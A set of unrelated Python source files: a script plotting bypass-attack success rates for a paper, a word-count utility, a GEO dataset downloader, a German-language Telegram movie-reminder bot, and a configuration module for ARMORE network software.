val_3 = np.round(np.mean([val_1, val_2]), 5)
per_usr_cracked_dict_comb[ds][clf][at].loc[row, "per_crk"] = val_3
per_usr_cracked_dict_comb[ds][clf][at].loc[row, "at_type"] = at
per_usr_cracked_dict_comb[ds][clf][at].try_num = \
per_usr_cracked_dict_comb[ds][clf][at].try_num.astype("float64")
per_usr_cracked_dict_comb[ds][clf][at]["per_crk"] = \
per_usr_cracked_dict_comb[ds][clf][at]["per_crk"].astype("float64")
per_usr_cracked_dict_comb[ds][clf][at]["at_type"] = \
per_usr_cracked_dict_comb[ds][clf][at]["at_type"].astype("string")
per_usr_cracked_dict_comb[ds][clf]['Hypervolume'] = \
pd.concat([pd.DataFrame({'try_num': 0, 'per_crk': 0, 'at_type': 'Hypervolume'}, index=[0]),
per_usr_cracked_dict_comb[ds][clf]['Hypervolume']]).reset_index(drop=True)
per_usr_cracked_dict_comb[ds][clf]['Vanilla-s'] = \
pd.concat([pd.DataFrame({'try_num': 0, 'per_crk': 0, 'at_type': 'Vanilla-s'}, index=[0]),
per_usr_cracked_dict_comb[ds][clf]['Vanilla-s']]).reset_index(drop=True)
per_usr_cracked_dict_comb[ds][clf]['K-means++'] = \
pd.concat([pd.DataFrame({'try_num': 0, 'per_crk': 0, 'at_type': 'K-means++'}, index=[0]),
per_usr_cracked_dict_comb[ds][clf]['K-means++']]).reset_index(drop=True)
per_usr_cracked_dict_comb[ds][clf]['MasterKey'] = \
pd.concat([pd.DataFrame({'try_num': 0, 'per_crk': 0, 'at_type': 'MasterKey'}, index=[0]),
per_usr_cracked_dict_comb[ds][clf]['MasterKey']]).reset_index(drop=True)
plt_df[ds][clf] = pd.concat([per_usr_cracked_dict_comb[ds][clf]['Hypervolume'],
per_usr_cracked_dict_comb[ds][clf]['Vanilla-s'],
per_usr_cracked_dict_comb[ds][clf]['K-means++'],
per_usr_cracked_dict_comb[ds][clf]['MasterKey']])
sns.set_theme(context='poster', style="white", font_scale=1.75)
line_draw_list = [1, 5, 10, 20, 50]
fig_dict = {ds: {clf: plt.figure(figsize=(19.2, 10.8)) for clf in clf_types} for ds in data_sets}
ax_dict = {ds: {clf: fig_dict[ds][clf].add_subplot(111) for clf in clf_types} for ds in data_sets}
for ds in data_sets:
for clf in clf_types:
sns.lineplot(data=plt_df[ds][clf], x="try_num", y="per_crk", hue="at_type", ax=ax_dict[ds][clf])
sns.scatterplot(data=plt_df[ds][clf].loc[line_draw_list, :], x="try_num", y="per_crk", hue="at_type",
ax=ax_dict[ds][clf], legend=None)
ax_dict[ds][clf].legend(loc=(0.0, 1.01), ncol=4, columnspacing=1.0, handletextpad=0.4, handlelength=1.0,
frameon=False)
ax_dict[ds][clf].set_ylabel("% Compromised")
ax_dict[ds][clf].set_xlabel("Attempts to Bypass")
ax_dict[ds][clf].set_ylim([-0.01, 1.01])
for x_pos in line_draw_list:
ax_dict[ds][clf].axvline(x=x_pos, c='gray', alpha=0.99, linestyle='dotted')
fig_dict[ds][clf].tight_layout()
fig_dict[ds][clf].savefig(os.path.join(plt_save_path, f"{ds}_{clf}_at_{row_range}_comp.pdf"))
fig_dict_p = {ds: {clf: {line: plt.figure(figsize=(19.2, 10.8)) for line in line_draw_list}
for clf in clf_types} for ds in data_sets}
ax_dict_p = {ds: {clf: {line: fig_dict_p[ds][clf][line].add_subplot(111) for line in line_draw_list}
for clf in clf_types} for ds in data_sets}
for ds in data_sets:
for clf in clf_types:
for attempt, idx in zip(line_draw_list, range(len(line_draw_list))):
sp_list = line_draw_list[:idx+1]
lp_list = [0]
lp_list.extend(sp_list)
sns.lineplot(data=plt_df[ds][clf].loc[lp_list, :], x="try_num", y="per_crk",
hue="at_type", ax=ax_dict_p[ds][clf][attempt])
sns.scatterplot(data=plt_df[ds][clf].loc[sp_list, :],
x="try_num", y="per_crk", hue="at_type",
ax=ax_dict_p[ds][clf][attempt], legend=None)
ax_dict_p[ds][clf][attempt].legend(loc=(0.0, 1.01), ncol=4, columnspacing=1.0, handletextpad=0.4, handlelength=1.0,
frameon=False)
ax_dict_p[ds][clf][attempt].set_ylabel("% Compromised")
ax_dict_p[ds][clf][attempt].set_xlabel("Attempts to Bypass")
ax_dict_p[ds][clf][attempt].set_ylim([-0.01, 1.01])
for x_pos in line_draw_list:
ax_dict_p[ds][clf][attempt].axvline(x=x_pos, c='gray', alpha=0.99, linestyle='dotted')
fig_dict_p[ds][clf][attempt].tight_layout()
fig_dict_p[ds][clf][attempt].savefig(os.path.join(plt_save_path, f"{ds}_{clf}_at_{row_range}_comp-{idx}.png"))
paper_table = pd.DataFrame(columns=['Dataset', 'Classifier', 'Try', 'Hypervolume', 'Vanilla-s', 'K-means++',
'MasterKey'])
paper_table_f = {ds: {clf: pd.DataFrame(columns=['try', 'Hypervolume', 'Vanilla-s', 'K-means++', 'MasterKey'])
for clf in clf_types}
for ds in data_sets}
for ds in data_sets:
for clf in clf_types:
for row in range(row_range + 1):
paper_table_f[ds][clf].loc[row, 'try'] = row
paper_table_f[ds][clf].loc[row, 'Hypervolume'] = \
plt_df[ds][clf][plt_df[ds][clf].at_type == "Hypervolume"].per_crk[row]
paper_table_f[ds][clf].loc[row, 'Vanilla-s'] = \
plt_df[ds][clf][plt_df[ds][clf].at_type == "Vanilla-s"].per_crk[row]
paper_table_f[ds][clf].loc[row, 'K-means++'] = \
plt_df[ds][clf][plt_df[ds][clf].at_type == "K-means++"].per_crk[row]
paper_table_f[ds][clf].loc[row, 'MasterKey'] = \
plt_df[ds][clf][plt_df[ds][clf].at_type == "MasterKey"].per_crk[row]
# row_list = [0, 4, 9, 14, 19, 24, 49]
if row_range == 10:
row_list = [0, 2, 3, 4, 5, 6, 7, 8, 9]
elif row_range == 50:
# row_list = [0, 1, 2, 3, 4, 5, 10, 15, 20, 25, 50]
row_list = range(51)
elif row_range == 100:
row_list = [0, 4, 9, 24, 49, 74, 99]
row_c = 0
for ds in data_sets:
for clf in clf_types:
for trn in row_list:
paper_table.loc[row_c, 'Dataset'] = ds
paper_table.loc[row_c, 'Classifier'] = clf
paper_table.loc[row_c, 'Try'] = trn
paper_table.loc[row_c, 'Hypervolume'] = paper_table_f[ds][clf].loc[trn, 'Hypervolume']
paper_table.loc[row_c, 'Vanilla-s'] = paper_table_f[ds][clf].loc[trn, 'Vanilla-s']
paper_table.loc[row_c, 'K-means++'] = paper_table_f[ds][clf].loc[trn, 'K-means++']
paper_table.loc[row_c, 'MasterKey'] = paper_table_f[ds][clf].loc[trn, 'MasterKey']
row_c += 1
paper_table.to_csv(os.path.join(plt_save_path, f"results_{row_range}_sum.csv"), index=False, mode='w+')
|
<filename>pywc_modules/utils.py
def stripNonAlphaNum(text):
""" Delete non alphanumerical character into a string text and return a list """
import re
return re.compile(r"\W+", re.UNICODE).split(text)
def readfile(filepath):
""" Read a text file and return the content as string """
import os, sys
if not os.path.isfile(filepath):
print "File path : " ,filepath, " does not exist!"
sys.exit(2)
with open(filepath) as fp:
return fp.read()
def readurl(urlsite):
""" Read a site url and return the content as string """
import urllib2
import re, sys
tagHtml = re.compile(r"<[^>]+>")
page = None
# Approprriate headers to avoid any 403 forbidden errors
hdr = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.3",
"Accept-Encoding": "none",
"Accept-Language": "en-US,en;q=0.8",
"Connection": "keep-alive"}
# Perform a HTTP request by passing URL and setting headers
req = urllib2.Request(urlsite, headers=hdr)
try:
page = urllib2.urlopen(req)
except:
print "Error: Cannot open url: ", urlsite, " !"
sys.exit(2)
# Read the response
content = page.read()
# Delete uneeded content
contentNoScript = re.sub(r"(\<script)\s*[^\>]*\>([^\<]*\<\/script>)", "", content)
contentNoScriptAndStyles = re.sub("r(\<style)\s*[^\>]*\>([^\<]*\<\/style>)", "", contentNoScript)
contentNoTags = tagHtml.sub("", contentNoScriptAndStyles)
contentUnescaped = re.sub(r"&(#?[xX]?(?:[0-9a-fA-F]+|\w{1,8}));", " ", contentNoTags)
return contentUnescaped
def numberOfChar(stringList):
""" Returns number of char into a list of strings and return a int """
return sum(len(s) for s in stringList)
def getargs(argv):
"""
Returns given arguments into dict
args :
- -i <inputfile>|<url> (str) : input file's path
- -l <lengthword> (int) : minimum word length to display
- -n <wordoccur> (int) : minimum word times to display
- -o <outputfile>"(str) : output file's path
Return : dict
"""
import sys, getopt
argsDict = {}
try:
opts, args = getopt.getopt(argv, "hi:u:l:n:o:", ["ifile=","url=", "lword=", "nword=", "ofile="])
except getopt.GetoptError:
print "main.py -i|-u <inputfile>|<url> -l <lengthword> -n <wordoccur> -o <outputfile>"
sys.exit(2)
if len(opts) == 0:
print "main.py -i|-u <inputfile>|<url> -l <lengthword> -n <wordoccur> -o <outputfile>"
sys.exit(2)
for opt, arg in opts:
if opt == "-h":
#print "main.py -i <inputfile> -l <lengthword> -n <wordoccur> -o <outputfile>"
argsDict["help"] = "Display help"
elif opt in ("-i", "--ifile"):
argsDict["inputfile"] = arg
elif opt in ("-u", "--url"):
argsDict["url"] = arg
elif opt in ("-l", "--lword"):
try:
argsDict["lengthword"] = int(arg)
except:
print "Error: -l (--lword) argument must be a number!"
sys.exit(2)
elif opt in ("-n", "--nword"):
try:
argsDict["wordoccur"] = int(arg)
except:
print "Error: -n (--nword) argument must be a number!"
sys.exit(2)
elif opt in ("-o", "--ofile"):
argsDict["outputfile"] = arg
return argsDict
|
from Module import AbstractModule
class Module(AbstractModule):
def __init__(self):
AbstractModule.__init__(self)
def run(
self, network, antecedents, out_attributes, user_options, num_cores,
outfile):
"""given a database ID and GPLID, get the files"""
from Betsy import module_utils
#in_data = antecedents
GSEID = user_options['GSEID']
GPLID = None
if 'GPLID' in user_options:
GPLID = user_options['GPLID']
assert GSEID.startswith('GSE'), 'GSEID %s is not correct' % GSEID
if not GPLID:
download_geo_with_GSEID(GSEID, outfile)
else:
assert GPLID.startswith('GPL'), 'GPLID %s is not correct' % GPLID
download_geo_with_GPLID(GSEID, GPLID, outfile)
assert filelib.exists_nz(outfile), (
'the output file %s for download_geo_dataset_GPL fails' % outfile
)
def name_outfile(self, antecedents, user_options):
from Betsy import module_utils
original_file = module_utils.get_inputid(user_options['GSEID'])
filename = 'expression_files_' + original_file
return filename
def clean_cel_filename(cel_file):
"""clean the cel_file name"""
import string
if cel_file.upper().endswith('CEL'):
cel_file = cel_file[0:-4]
punc = string.punctuation
indicate = [x in cel_file for x in punc]
if True in indicate:
punct_index = []
start = 0
while start < len(indicate) - 1:
try:
start = indicate.index(True, start + 1)
punct_index.append(start)
except (SystemError, MemoryError, KeyError), x:
raise
except Exception:
break
break_point = [cel_file.index(punc[x]) for x in punct_index]
return cel_file[0:min(break_point)] + '.CEL'
else:
return cel_file + '.CEL'
else:
return cel_file
def download_geo_with_GSEID(GSEID, outfile):
import os
import shutil
from Betsy import module_utils
from genomicode import affyio
import gzip
#file_folder = os.path.join(".", GSEID)
file_folder = module_utils.download_dataset(GSEID)
#get chip name
cel_files = os.listdir(file_folder)
unknown_folder = os.path.join(".", 'unknown_folder')
chip_name_list = []
for cel_file in cel_files:
fileloc = os.path.join(file_folder, cel_file)
if fileloc.endswith('.gz'):
newcelfname = clean_cel_filename(os.path.splitext(cel_file)[0])
#unzip the gz data
unzipfile = os.path.splitext(fileloc)[0]
fileObj = gzip.GzipFile(fileloc, 'rb')
fileObjOut = file(unzipfile, 'wb')
while 1:
line = fileObj.readline()
if line == '':
break
fileObjOut.write(line)
fileObj.close()
fileObjOut.close()
assert os.path.exists(unzipfile), ('the unzip %s fails' % unzipfile
)
else:
unzipfile = fileloc
newcelfname = clean_cel_filename(cel_file)
#get chip_name and copy into different folder
chip_name = None
try:
chip_name = affyio.extract_chip_name(unzipfile)
except (SystemError, MemoryError, KeyError), x:
raise
except Exception, x:
if not os.path.exists(unknown_folder):
os.mkdir(unknown_folder)
shutil.copyfile(unzipfile,
os.path.join(unknown_folder, newcelfname))
if chip_name is not None:
if chip_name not in chip_name_list:
chip_name_list.append(chip_name)
os.mkdir(os.path.join(".", chip_name))
chip_folder = os.path.join(".", chip_name)
shutil.copyfile(unzipfile, os.path.join(chip_folder, newcelfname))
if fileloc.endswith('.gz'):
os.remove(unzipfile)
#determine the one to preprocess
if len(chip_name_list) == 1:
out_filename = os.path.join(".", chip_name_list[0])
elif len(chip_name_list) > 1:
size_list = [os.path.getsize(os.path.join(".", x))
for x in chip_name_list]
#makesure there is no multiple folder have the same maximum size
maxsize = max(size_list)
new_size_list = size_list[:]
new_size_list.remove(maxsize)
#only one folder is maximum size
if maxsize > max(new_size_list):
out_chip_name = chip_name_list[size_list.index(maxsize)]
#out_filename = os.path.join(".", out_chip_name)
#multiple has same maximum size
elif maxsize == max(new_size_list):
start = -1
folder_index = []
while start < len(size_list) - 1:
try:
start = size_list.index(maxsize, start + 1)
folder_index.append(start)
except (SystemError, MemoryError, KeyError), x:
raise
except Exception:
break
folder_names = [chip_name_list[x] for x in folder_index]
Is_HG = [x.startswith('HG') for x in folder_names]
a = []
for i in Is_HG:
if i:
a.append(1)
else:
a.append(0)
#choose the human platform
if sum(a) == 1:
out_chip_name = folder_names[a.index(1)]
out_filename = os.path.join(".", out_chip_name)
#multipld human paltforms
elif sum(a) > 1:
if 'HG-U133_Plus_2' in folder_names:
out_filename = os.path.join(".", 'HG-U133_Plus_2')
elif 'HG-U133A' in folder_names:
out_filename = os.path.join(".", 'HG-U133A')
elif 'HG-U95A' in folder_names:
out_filename = os.path.join(".", 'HG-U95A')
else:
raise ValueError('does not recognazie the platform')
os.rename(out_filename, outfile)
matrix_files = get_seriesmatrix_file(GSEID)
for matrix_file in matrix_files:
newmatrix_filename = os.path.split(matrix_file)[-1]
shutil.copyfile(matrix_file, os.path.join(outfile, newmatrix_filename))
def download_geo_with_GPLID(GSEID, GPLID, outfile):
import os
import shutil
from Betsy import module_utils
GSEID_path = module_utils.download_dataset(GSEID)
platform_txtfiles = get_seriesmatrix_file(GSEID, GPLID)
#get the cel file name for the GPL platform
if not os.path.exists(outfile):
os.mkdir(outfile)
if len(platform_txtfiles) > 0:
for platform_txtfile in platform_txtfiles:
cel_list = open(platform_txtfile, 'r').readlines()
cel_line = None
for linecontent in cel_list:
if linecontent.startswith('!Sample_geo_accession'):
cel_line = linecontent
break
assert cel_line, (
'the file %s does not contain "!Sample_geo_accession"' %
platform_txtfile)
filecontent = os.listdir(GSEID_path)
cel_names = []
for x in linecontent.split()[1:]:
x = x.strip()
assert x.startswith('\"') and x.endswith('\"')
x = x[1:-1]
cel_names.append(x)
#check if the GSM Id cannot found in the data set
file_name_string = ' '.join(filecontent)
for cel_name in cel_names:
if cel_name not in file_name_string:
raise ValueError(
'The GSM ID %s cannot find in data set' % cel_name)
else:
for cel_file in filecontent:
if cel_file.upper().startswith(cel_name.upper()):
if cel_file.lower().endswith('gz'):
cel_file = clean_cel_filename(
os.path.splitext(cel_file)[0]) + '.gz'
outfilename = os.path.join(outfile, cel_file)
shutil.copyfile(os.path.join(GSEID_path, cel_file),
outfilename)
else:
os.rename(GSEID_path, outfile)
for matrix_file in platform_txtfiles:
newmatrix_filename = os.path.split(matrix_file)[-1]
shutil.copyfile(matrix_file, os.path.join(outfile, newmatrix_filename))
def get_seriesmatrix_file(GSEID, GPLID):
'download series matrix and unzip'
import os
from ftplib import FTP
#from genomicode import Matrix
try:
ftp = FTP('ftp.ncbi.nih.gov')
ftp.login()
except Exception, e:
raise ValueError(e)
try:
ftp.cwd('pub/geo/DATA/SeriesMatrix/' + GSEID)
except FTP.error_perm, x:
if str(x).find('No such file') >= 0:
raise AssertionError('cannot find the %s' % path)
entry = []
ftp.retrlines('NLST', entry.append)
platform_txtfiles = []
for platform_filename in entry:
if GPLID in platform_filename:
f = open(platform_filename, 'wb')
ftp.retrbinary('RETR ' + platform_filename, f.write)
f.close()
platform_txtfile = platform_filename[:-3]
assert not os.path.exists(platform_txtfile), (
'the seriesmatrix file %s already exists' % platform_txtfile
)
#unzip the gz data
import gzip
fileObj = gzip.GzipFile(platform_filename, 'rb')
fileObjOut = file(platform_txtfile, 'wb')
while 1:
line = fileObj.readline()
if line == '':
break
fileObjOut.write(line)
fileObj.close()
fileObjOut.close()
os.remove(platform_filename)
assert os.path.exists(platform_txtfile), (
'the unzip %s in download_geo_dataset_GPL fails' % platform_txtfile
)
platform_txtfiles.append(os.path.realpath(platform_txtfile))
ftp.close()
return platform_txtfiles
def get_seriesmatrix_file(GSEID):
'download series matrix and unzip'
import os
from ftplib import FTP
import gzip
try:
ftp = FTP('ftp.ncbi.nih.gov')
ftp.login()
except Exception, e:
raise ValueError(e)
ftp.cwd('pub/geo/DATA/SeriesMatrix/' + GSEID)
#try:
# ftp.cwd('pub/geo/DATA/SeriesMatrix/' + GSEID)
#except FTP.error_perm, x:
# raise
# #if str(x).find('No such file') >= 0:
# # raise AssertionError('cannot find the %s' % path)
entry = []
ftp.retrlines('NLST', entry.append)
platform_txtfiles = []
for platform_filename in entry:
f = open(platform_filename, 'wb')
ftp.retrbinary('RETR ' + platform_filename, f.write)
f.close()
platform_txtfile = platform_filename[:-3]
assert not os.path.exists(platform_txtfile), (
'the seriesmatrix file %s already exists' % platform_txtfile
)
#unzip the gz data
fileObj = gzip.GzipFile(platform_filename, 'rb')
fileObjOut = file(platform_txtfile, 'wb')
while 1:
line = fileObj.readline()
if line == '':
break
fileObjOut.write(line)
fileObj.close()
fileObjOut.close()
os.remove(platform_filename)
assert os.path.exists(platform_txtfile), (
'the unzip %s in download_geo_dataset_GPL fails' % platform_txtfile
)
platform_txtfiles.append(os.path.realpath(platform_txtfile))
ftp.close()
return platform_txtfiles
|
# encoding: utf-8
import json
import logging
from urllib2 import urlopen
from urllib import urlencode
from datetime import datetime
from google.appengine.api import urlfetch
from google.appengine.ext import ndb
import webapp2
TOKEN = open('bot.token').read()
BASE_URL = 'https://api.telegram.org/bot' + TOKEN + '/'
BOT_NAME = 'tufilmbot'
# ================================
# Data store classes
class Subscriber(ndb.Model):
chat_id = ndb.IntegerProperty()
class Movie(ndb.Model):
title = ndb.StringProperty()
date = ndb.DateTimeProperty()
url = ndb.StringProperty()
imdbLink = ndb.StringProperty()
imdbRating = ndb.StringProperty()
# ================================
# Helper functions
def add_subscriber(c_id):
check = Subscriber.query(Subscriber.chat_id == c_id).fetch()
if check:
return 0
else:
subscriber = Subscriber(chat_id=c_id)
subscriber.put()
return 1
def remove_subscriber(c_id):
check = Subscriber.query(Subscriber.chat_id == c_id).fetch()
if check:
check[0].key.delete()
return 1
return 0
def add_movie(title, date, url, imdblink, imdbrating):
Movie(title=title,
date=datetime.strptime(date, '%Y-%m-%dT%H:%M'),
url=url,
imdbLink=imdblink,
imdbRating=imdbrating).put()
def get_formatted_movie_list():
today = datetime.now()
all_movies = Movie.query(Movie.date >= today).fetch()
all_movies.sort(key=lambda movie_element: movie_element.date)
movie_list = ''
for movie in all_movies:
movie_list += (movie.date.strftime('%d.%m.%Y') + ': ' + movie.title + '\n')
return movie_list
def get_next_movie():
today = datetime.now()
query_movies_sorted = Movie.query(Movie.date >= today).fetch()
query_movies_sorted.sort(key=lambda movie: movie.date)
return query_movies_sorted[0]
def get_formatted_short_reminder(next_movie):
return 'Nicht vergessen, heute im TU Film: ' \
+ next_movie.title + '\nBeginn um ' \
+ next_movie.date.strftime('%H:%M Uhr')
def get_formatted_movie(head, title, date=None, url=None, imdblink=None, imdbrating=None):
text = '<b>' + head + '</b>\n' + title
if date:
text += '\n' + date.strftime('%d.%m.%Y um %H:%M Uhr')
if url:
text += '\nInfos: <a href="' + url + '">Link</a>'
if imdblink:
text += '\nIMDb: <a href="' + imdblink + '">Link</a>'
if imdbrating:
text += u'\nIMDb ★: ' + imdbrating
return text
# Send a message from the Bot
# HTML encoded
def reply(chat_id, msg=None):
if msg:
resp = urlopen(BASE_URL + 'sendMessage', urlencode({
'chat_id': str(chat_id),
'text': msg.encode('utf-8'),
'parse_mode': 'HTML',
'disable_web_page_preview': 'true',
})).read()
else:
logging.error('no message specified')
resp = None
logging.info('send response:')
logging.info(resp)
# ================================
# Google App Request Handlers
# set the web hook for the Telegram API
class SetWebHookHandler(webapp2.RequestHandler):
def get(self):
urlfetch.set_default_fetch_deadline(60)
url = self.request.get('url')
if url:
self.response.write(json.dumps(json.load(urlopen(BASE_URL + 'setWebhook', urlencode({'url': url})))))
# triggered over cron job
class ReminderHandler(webapp2.RequestHandler):
def get(self):
next_movie = get_next_movie()
if datetime.date(datetime.now()) == next_movie.date.date():
all_subscriber = Subscriber.query(projection=["chat_id"], distinct=True)
# send reminder message to every subscriber
# care if to many subscribers -> limitations from telegram api
msg = get_formatted_short_reminder(next_movie)
for sub in all_subscriber:
reply(sub.chat_id, msg)
# Handler for adding a new Movie over a URL
class MovieHandler(webapp2.RequestHandler):
def get(self):
urlfetch.set_default_fetch_deadline(60)
title = self.request.get('title')
date = self.request.get('date')
url = self.request.get('url')
imdblink = self.request.get('imdblink')
imdbrating = self.request.get('imdbrating')
add_movie(title, date, url, imdblink, imdbrating)
# Starts the crawler
# Does nothing currently because the crawler script ist not yet imported
class GetMoviesHandler(webapp2.RedirectHandler):
# links = get_all_title_links()
# movie_list = get_movie_details(links)
movie_list = []
for movie in movie_list:
add_movie(movie[0], movie[1], movie[2], movie[3], movie[4])
# Handles messages from Telegram
class WebHookHandler(webapp2.RequestHandler):
def post(self):
urlfetch.set_default_fetch_deadline(60)
json_body = json.loads(self.request.body)
# log request
logging.info('request body:')
logging.info(json_body)
self.response.write(json.dumps(json_body))
# get chat and message information
message = json_body['message']
text = message.get('text')
chat = message['chat']
chat_id = chat['id']
if not text:
logging.info('no text')
return
if text.startswith('/'):
if text.find('@') > 0:
if text.find(BOT_NAME) > 0:
text = text[0:text.find('@')]
else:
return
if text == '/subscribe':
if add_subscriber(chat_id) == 1:
reply(chat_id, 'Für den Alarm angemeldet!')
else:
reply(chat_id, 'Bereits angemeldet!')
elif text == '/unsubscribe':
if remove_subscriber(chat_id) == 1:
reply(chat_id, 'Abgemeldet vom Alarm!')
else:
reply(chat_id, 'Nicht angemeldet!')
elif text == '/listall':
reply(chat_id, get_formatted_movie_list())
elif text == '/next':
next_movie = get_next_movie()
reply(chat_id, get_formatted_movie(u'Als nächstes im TU Film',
next_movie.title,
next_movie.date,
next_movie.url,
next_movie.imdbLink,
next_movie.imdbRating))
else:
reply(chat_id, u'Befehl ungebekannt. Benutze / für eine Überischt möglicher Befehle.')
else:
# reply(chat_id, "Use /<command>. See possible commands with /? or /commands.")
return
# The App
app = webapp2.WSGIApplication([
('/set_webhook', SetWebHookHandler),
('/webhook', WebHookHandler),
('/reminder', ReminderHandler),
('/add_movie', MovieHandler),
('/get_movies', GetMoviesHandler),
], debug=True)
|
<filename>source/webServer/domains/support/config.py
# # # #
# config.py
#
# University of Illinois/NCSA Open Source License
# Copyright (c) 2015 Information Trust Institute
# All rights reserved.
#
# Developed by:
#
# Information Trust Institute
# University of Illinois
# http://www.iti.illinois.edu
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal with
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is furnished to do
# so, subject to the following conditions:
#
# Redistributions of source code must retain the above copyright notice, this list
# of conditions and the following disclaimers. Redistributions in binary form must
# reproduce the above copyright notice, this list of conditions and the following
# disclaimers in the documentation and/or other materials provided with the
# distribution.
#
# Neither the names of Information Trust Institute, University of Illinois, nor
# the names of its contributors may be used to endorse or promote products derived
# from this Software without specific prior written permission.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE CONTRIBUTORS
# OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS WITH THE SOFTWARE.
#
# # # # #
import domains.support.lib.common as comLib
import domains.support.network as netLib
import re
import os.path
import threading
from string import Template
# These get called a lot, get them once when read in to prevent lots of file reads
ARMORE_CFG_FILE = comLib.getSupportFilePath("ArmoreConfig")
PROXY_CFG_FILE_BACKEND = comLib.getSupportFilePath("ProxyConfigBackend")
PROXY_CFG_FILE = comLib.getSupportFilePath("ProxyConfig")
TRANSPARENT_CFG_FILE = comLib.getSupportFilePath("TransparentConfig")
PASSIVE_CFG_FILE = comLib.getSupportFilePath("PassiveConfig")
PROXY_NETWORK_FILE = comLib.getSupportFilePath("ProxyNetworkTemplate")
PASSIVE_NETWORK_FILE = comLib.getSupportFilePath("PassiveNetworkTemplate")
TRANSPARENT_NETWORK_FILE = comLib.getSupportFilePath("TransparentNetworkTemplate")
PROXY_CFG_BACKEND_TEMPLATE = comLib.getSupportFilePath("ProxyConfigBackendTemplate")
PASSIVE_CFG_BACKEND_TEMPLATE = comLib.getSupportFilePath("PassiveConfigBackendTemplate")
TRANSPARENT_CFG_BACKEND_TEMPLATE = comLib.getSupportFilePath("TransparentConfigBackendTemplate")
cfgFiles = {
'armore': ARMORE_CFG_FILE,
'proxy': PROXY_CFG_FILE,
'transparent': TRANSPARENT_CFG_FILE,
'passive': PASSIVE_CFG_FILE
}
netFiles = {
'proxy': PROXY_NETWORK_FILE,
'transparent': TRANSPARENT_NETWORK_FILE,
'passive': PASSIVE_NETWORK_FILE
}
def restartProxy():
comLib.cmd('/etc/init.d/armoreconfig stop')
comLib.cmd('/etc/init.d/armoreconfig start')
#comLib.cmd('broctl restart')
def restartBro():
comLib.cmd('broctl restart')
# Gets configuration from specified file as key value pair
def getConfigFromFile(theFile):
ret = {}
if os.path.exists(theFile):
configFile = open(theFile, 'r')
for l in configFile.readlines():
if len(l.split('=')) < 2:
continue
key, value = [re.sub(r'"', "", x.strip()) for x in l.rstrip().split('=')]
ret[key] = value
return ret
# Synchronizes the webServer config files and the backend config files
def synchConfigs():
armoreBackConf = getArmoreConfigBackend()
if "Operation" not in armoreBackConf:
return
mode = armoreBackConf.get("Operation")
aConf = {}
aConf["managementIp"] = armoreBackConf.get("ManagementIp")
aConf["managementInterface"] = armoreBackConf.get("ManagementInt")
aConf["managementMask"] = armoreBackConf.get("ManagementMask")
aConf["operationMode"] = mode
mConf = {}
if mode == "Proxy":
mConf["roleType"] = armoreBackConf.get("Roletype")
mConf["port"] = armoreBackConf.get("Port")
mConf["bind"] = armoreBackConf.get("Bind")
mConf["capture"] = armoreBackConf.get("Capture")
mConf["encryption"] = armoreBackConf.get("Encryption")
mConf["firewall"] = armoreBackConf.get("Firewall")
mConf["interface"] = armoreBackConf.get("Interface")
mConf["operationMode"] = "Proxy"
if mode == "Passive":
mConf["operationMode"] = "Passive"
mConf["monitored_interface"] = armoreBackConf.get("Interface")
aConf["internalInterface"] = mConf.get("monitored_interface")
aConf["internalIp"] = netLib.getIpAddrFromInt(mConf.get("monitored_interface"))
if mode == "Transparent":
mConf["Operation"] = "Transparent"
mConf["interface1"] = armoreBackConf.get("Interface1")
mConf["interface2"] = armoreBackConf.get("Interface2")
mConf["bridgeIp"] = armoreBackConf.get("Bind")
mConf["broadcastIp"] = armoreBackConf.get("BroadcastIp")
mConf["netmask"] = armoreBackConf.get("Netmask")
mConf["gateway"] = armoreBackConf.get("Gateway")
mConf["route"] = armoreBackConf.get("Route")
updateConfig(mConf, "mode")
updateConfig(aConf, "armore")
maConf = mConf.copy()
maConf.update(aConf)
updateConfig(maConf, "backend")
return aConf
# Get management interface information
def getMgmtConfig():
configAll = getArmoreConfigBackend()
config = {key: configAll[key] for key in configAll if re.match(".*Management.*", key)}
return config
def getArmoreConfigBackend():
return getConfigFromFile(PROXY_CFG_FILE_BACKEND)
def getArmoreConfig():
return getConfigFromFile(ARMORE_CFG_FILE)
def getProxyConfig():
return getConfigFromFile(PROXY_CFG_FILE)
def getTransparentConfig():
return getConfigFromFile(TRANSPARENT_CFG_FILE)
def getPassiveConfig():
return getConfigFromFile(PASSIVE_CFG_FILE)
# Generic function for getting a configuration
def getConfig(mode):
if mode.lower() == "proxy":
return getProxyConfig()
elif mode.lower() == "passive":
return getPassiveConfig()
elif mode.lower() == "transparent":
return getTransparentConfig()
else:
return getArmoreConfig()
# Write configuration to a template and output file
def writeTemplate(inp, tempFile, outFile):
t = Template(open(tempFile, 'r').read())
o = t.substitute(inp)
with open(outFile, 'w') as f:
f.write(o)
# Write configuration information to the configuration file
def writeConfig(config, theType):
#aConf = Template(open(comLib.getSupportFilePath("ArmoreConfigTemplate"), 'r').read())
confFileTemp = None
confFileToWrite = None
if theType == "armore":
confFileTemp = comLib.getSupportFilePath("ArmoreConfigTemplate")
confFileToWrite = ARMORE_CFG_FILE
elif config.get("operationMode") == "Proxy":
confFileTemp = comLib.getSupportFilePath("ProxyConfigTemplate")
confFileToWrite = PROXY_CFG_FILE
elif config.get("operationMode") == "Passive":
confFileTemp = comLib.getSupportFilePath("PassiveConfigTemplate")
confFileToWrite = PASSIVE_CFG_FILE
elif config.get("operationMode") == "Transparent":
confFileTemp = comLib.getSupportFilePath("TransparentConfigTemplate")
confFileToWrite = TRANSPARENT_CFG_FILE
else:
print("# Unable to write config for '{}' mode".format(config.get("operationMode")))
